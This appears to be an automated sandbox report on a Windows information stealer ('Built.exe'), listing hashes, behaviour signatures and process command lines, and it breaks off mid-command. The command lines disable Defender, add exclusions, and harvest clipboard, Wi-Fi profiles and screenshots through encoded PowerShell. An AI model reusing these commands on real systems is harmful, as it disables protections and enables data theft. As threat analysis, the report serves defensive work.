| SHA256 | 272ed278e82c84cf4f80f48ec7989e1fc35f2055d6d05b63c8a31880846597a6 |
| SHA512 | b8938526fcbf7152805aec130ca553e3ec949cb825430a5d0a25c90ec5eb0863857010484a4b31fdc4bb65a4c92ad7127c812b93114be4569a677f60debe43b1 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\Recently.docx
| MD5 | 3b068f508d40eb8258ff0b0592ca1f9c |
| SHA1 | 59ac025c3256e9c6c86165082974fe791ff9833a |
| SHA256 | 07db44a8d6c3a512b15f1cb7262a2d7e4b63ced2130bc9228515431699191cc7 |
| SHA512 | e29624bc8fecb0e2a9d917642375bd97b42502e5f23812195a61a4920cae5b6ed540e74dfcf8432dcceb7de906ad0501cdd68056f9b0ec86a6bb0c1e336bfe32 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\These.docx
| MD5 | 87cbab2a743fb7e0625cc332c9aac537 |
| SHA1 | 50f858caa7f4ac3a93cf141a5d15b4edeb447ee7 |
| SHA256 | 57e3b0d22fa619da90237d8bcf8f922b142c9f6abf47efc5a1f5b208c4d3f023 |
| SHA512 | 6b678f0dd0030806effe6825fd52a6a30b951e0c3dcf91dfd7a713d387aa8b39ec24368e9623c463360acba5e929e268f75ce996526c5d4485894b8ac6b2e0fa |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Downloads\BackupWatch.gif
| MD5 | 1fa3e28841bce3bc5d241d0a4a28a471 |
| SHA1 | 2b6f43eb7d113fd5f387bf77efff57c9c7a30e26 |
| SHA256 | 857cecf49f6895dd02765d30221e6bf76ce17647f4f8eb6fee78d1cef9da097c |
| SHA512 | 693420357361a3302038cd71fbe024112876c615ba062b0ccc51bc532b7db2a20da23f9c47d883493782e8b09e833564cc00d6ef1392f3c735d912a3a1f8a192 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Downloads\CompleteGrant.docx
| MD5 | c68fc53d20bdc086b86184944bcde142 |
| SHA1 | d9a1b35fa890b6e4f9773975b0ecccf9922fbdfe |
| SHA256 | 10a9fd3cc26ae4836a65dba7d49b18addb30f5eea268e960a39e109b4ac89040 |
| SHA512 | a4a5b01abe3c6722b24b8db32ea88e2c7ac970b183c3040088f653fcc334fe03ace78d3dd16cf1a44b34a4ff318b0ae70e140040cd2e0ee458ccc1583bf7d857 |
memory/2440-299-0x00007FFFFAF40000-0x00007FFFFAF59000-memory.dmp
memory/2440-320-0x00007FFFFAF10000-0x00007FFFFAF34000-memory.dmp
memory/2440-321-0x00007FFFEB590000-0x00007FFFEBC69000-memory.dmp
memory/2440-336-0x00007FFFEB350000-0x00007FFFEB4C6000-memory.dmp
memory/2440-331-0x00007FFFEAF10000-0x00007FFFEAFDD000-memory.dmp
memory/2440-330-0x00007FFFF70A0000-0x00007FFFF70D3000-memory.dmp
memory/2440-322-0x00007FFFFB310000-0x00007FFFFB335000-memory.dmp
memory/2440-332-0x00007FFFEA9E0000-0x00007FFFEAF09000-memory.dmp
memory/2440-337-0x00007FFFEB590000-0x00007FFFEBC69000-memory.dmp
memory/2440-352-0x00007FFFFB310000-0x00007FFFFB335000-memory.dmp
memory/2440-365-0x00007FFFEA8C0000-0x00007FFFEA9DB000-memory.dmp
memory/2440-364-0x00007FF800550000-0x00007FF80055D000-memory.dmp
memory/2440-363-0x00007FFFFA850000-0x00007FFFFA864000-memory.dmp
memory/2440-362-0x00007FFFEA9E0000-0x00007FFFEAF09000-memory.dmp
memory/2440-361-0x00007FFFEAF10000-0x00007FFFEAFDD000-memory.dmp
memory/2440-360-0x00007FFFF70A0000-0x00007FFFF70D3000-memory.dmp
memory/2440-359-0x00007FF8009A0000-0x00007FF8009AD000-memory.dmp
memory/2440-358-0x00007FFFFA870000-0x00007FFFFA889000-memory.dmp
memory/2440-357-0x00007FFFEB350000-0x00007FFFEB4C6000-memory.dmp
memory/2440-356-0x00007FFFFAF10000-0x00007FFFFAF34000-memory.dmp
memory/2440-355-0x00007FFFFAF40000-0x00007FFFFAF59000-memory.dmp
memory/2440-354-0x00007FFFFB2B0000-0x00007FFFFB2DD000-memory.dmp
memory/2440-353-0x00007FF802480000-0x00007FF80248F000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-06-26 13:10
Reported
2024-06-26 13:14
Platform
win11-20240611-fr
Max time kernel
90s
Max time network
94s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\system32\attrib.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\system32\attrib.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\_MEI25922\rar.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Built.exe | N/A |
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Built.exe
"C:\Users\Admin\AppData\Local\Temp\Built.exe"
C:\Users\Admin\AppData\Local\Temp\Built.exe
"C:\Users\Admin\AppData\Local\Temp\Built.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\netsh.exe
netsh wlan show profile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsA